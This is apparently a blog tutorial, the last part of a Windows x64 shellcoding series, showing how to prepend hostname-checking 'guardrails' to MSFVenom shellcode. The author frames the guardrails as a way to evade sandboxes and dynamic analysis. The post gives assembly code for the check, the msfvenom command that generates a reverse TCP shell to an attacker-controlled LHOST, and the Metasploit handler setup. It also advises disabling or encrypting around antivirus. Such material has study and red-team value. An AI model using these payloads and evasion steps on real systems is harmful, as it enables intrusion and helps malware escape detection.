The third and final part of a three part series on Windows x64 Shellcoding. Going from a basic Hello World program in Assembly to implementing guardrails in MSFVenom shellcode.
Part 1 – Assembly and WinAPIs – Hello World
Part 2 – Assembly to Shellcode – Stack Buffers and WinAPIs
Part 3 – Adding extra functionality to MSFVenom
Most shellcoding tutorials show really interesting techniques, but don’t show anything practical. So I wanted to end this series but using the material to implement something interesting. We’re going to implement our own custom guard rails into MSFVenom shellcode.
In my experience, traditional payload development often uses the following pattern of behavior (I’m using Shellcode here in the traditional meaning, i.e. code that results in a shell, rather than just machine code).
- Guard rails
- Process injection
- Shellcode
What if we used our knowledge of Assembly to flip this behavior, so we would end up with the following.
- Process injection
- Guard rails
- Shellcode
This is purely speculative, but I suspect that this may be slightly more evasive than the traditional approach. My reasoning for this, is that process injection is a distinctive section of a payload that analysts may expect to be followed by explosive and malicious behavior. So if we were to add guard rails at the beginning of the shellcode, but after the process injection occurs, then this may add an extra layer of defense for sandbox and dynamic analysis.
My initial idea for implementing this was to have two pieces of shellcode. A custom piece of shellcode that implements guardrails, and a second piece of shellcode created by MSFVenom. We could then combine these together as follows:
guardrails = "\x48\x83\xec..."
msfvenom = "\xfc\x48\x83..."
shellcode = guardrails + msfvenom
We’ve already used GetComputerNameA
, so let’s use the hostname of the computer as the guardrails for the shellcode.
Attempt 1 – Conditional Jumps
So my first idea for this was to use conditional jumps, using labels code to define sections that the execution flow could jump to depending on comparison of the output of GetComputerNameA
.
cmp r13b, byte [r14+1]
je branch2
branch1:
; guardrails failed, do something and exit
branch2:
; guardrails succeeded, execute msf
The problem with this is that label, e.g. branch1
and branch2
are compiled into specific memory addresses, so this won’t work when injecting the shellcode into a new process. Another problem is we can’t use je
and similar because it requires labels, so I am only able to use jmp
.
Attempt 2 – Calculated Jumps
I didn’t really know what to call this, so I just called it a calculated jump. So if write our code as if it had labels, but we moved the labels the resulting code may look something like this
guardrails -> jump instruction -> branch1 -> branch2
My idea for calculated jumps is to figure out the distance from the jump instruction address to branch1
and branch1
to branch2
. Let’s say that the distance from the jump to branch1
was 10 bytes, and the distance from branch1
to branch2
was 20 bytes, then if we can get the value of the Zero Flag
, we can dynamically create the correct offset to the correct branch.
jmp_instr_addr + distance_to_b1 + (zf * distance_to_b2)
So if the Zero Flag
is 0
or 1
, depending on the output of the Guard Rails, our offset from our jump instruction address will either lead us into branch1
or branch2
.
As an extra measure you can also add NOP
sleds between each area, personally I did this as it just helps in-case you end up off by 1, you can then jump into the NOP
sled. Also you can align the jump offsets to multiples of 16 (not sure if this is important, stack alignment issues just fucked me up too much).
cmp r13b, byte [r14+1] ; compare bytes
sete al ; set al to zero flag
movzx rax, al ; zero extend al
mov rcx, 16 ; amount to jmp to branch1
mov rbx, 160
imul rbx, rax ; 0 or 1 multiplied by 160, so either 0 or 160
add rcx, rbx ; rcx is now 16 (16+0) or 176 (16+160)
mov rbx, $ ; get current assembly position
add rbx, rcx ; add jump offset
jmp rcx ; do conditional jump with single jmp
; push rcx && ret also worked
I was able to get this logic working when compiling as an executable, but when using as shellcode it didn’t work. Still not sure why, if you know or have any solutions please let me know. I suspect it’s something about the current assembly position when calculating in shellcode.
Attempt 3 – Run or Die
So finally I accepted that I couldn’t get conditional jumps working so I started thinking about other solutions. 0
in ASM can be considered as two possible data types, a NULL
value, or a 0
integer value. If we return to our MessageBoxA
example and look at the third argument in rcx
, it expects a string to display in the message box title, or alternatively a NULL
value. This means if we use a 0
or 1
in this argument, our code will either succeed or crash. So continuing from our progress in part 2, let’s get the guard rails working.
So we can implement our guardrails after our GetComputerNameA
call and before our MessageBoxA
call. I’m using r15
, r13
and rax
here just because of the context of the surrounding code, and I don’t have to save anything onto the stack because the values are reassigned before they are used again.
xor r15, r15 ; used for global boolean guardrail check
xor r13, r13 ; used for storing chars to compare to hostname
xor rax, rax ; use as a per-char guardrail check
mov r15, 1 ; set boolean for guardrail
So first I cleared the registers just in case a random higher-order bit causes problems. But we’re going to iterate over our hostname stored in our stack buffer one char at a time, which in my example is JWIN11
. So we need to repeat the following code six times and modify for each character.
mov r13b, 0x4a ; J
cmp r13b, byte [r14+0] ; compare first byte
sete al ; set ZF, 1 if comparison was equal
movzx rax, al ; zero extend
and r15, rax ; not efficient
So if all of our checks passed, r15
should not contain 1, otherwise 0
. We store it into r13
as the code used from Nytro’s blog will place the base address of the DLL into r15
. However, we need 0
in r13
if we wish to execute successfully, so we xor
the value to invert it.
mov r13, r15
xor r13, 1
After using the method described in Nytro’s blog, we can get a pointer to User32.dll
, then call GetProcAddress
with MessageBoxA
. Now we should have the address of MessageBoxA
in r15
.
mov rcx, 0
mov rdx, r14 ; our stack buffer from part 2
mov r8, r13
mov r9, 0
call r15
Now if we compile and extract the shellcode as we did in part 2, up until our latest MessageBoxA
call, and append msfvenom
shellcode after it, our guardrails should now act as an extra method of defense before our final shellcode executes. I’m going to use an x64
reverse shell from MSFVenom. Note that you will need to disable defender or encrypt the shellcode to bypass AV.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.180.219 LPORT=4444 -f c
Then setup the handler in Metasploit
.
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST=172.19.180.219
msf6 exploit(multi/handler) > run
Then execute the final EXE containing your guardrails and msfvenom shellcode. If your guardrails don’t match your hostname, the EXE should just silently crash. If the hostname matches, you should see a message box appear, after selecting OK
, the reverse shell should execute, followed by satisfaction.
If you’ve got this far, the best thing you can do is rewrite this to do something else. Following a tutorial is easy, implementing something new requires effort. My intention for this series was to provide an easy introduction, covering a lot of things that required extra research and weren’t covered by other tutorials, and to finish it by implementing something interesting so people can see a cool use case for learning how to do this stuff by hand.
If you learnt something cool and helped you with something, send me BTC for beer 🙂
bc1qannme72ya2gechk2ued2f96ec6v2veyctvz7mc